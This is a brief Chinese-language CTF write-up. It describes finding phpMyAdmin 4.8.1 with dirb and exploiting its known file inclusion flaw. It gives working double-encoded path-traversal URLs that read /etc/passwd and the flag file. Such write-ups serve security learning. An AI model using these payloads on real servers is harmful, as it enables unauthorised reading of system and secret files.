知识点
dirb扫描到后台有phpmyadmin目录,访问一下
版本为4.81,经查询,存在远程文件读取漏洞
直接上payload读取passwd文件
/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
读取成功,尝试读取flag文件
/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag
参考
phpMyAdmin 4.8.x 本地文件包含漏洞利用
phpmyadmin 4.8.1 远程文件包含漏洞
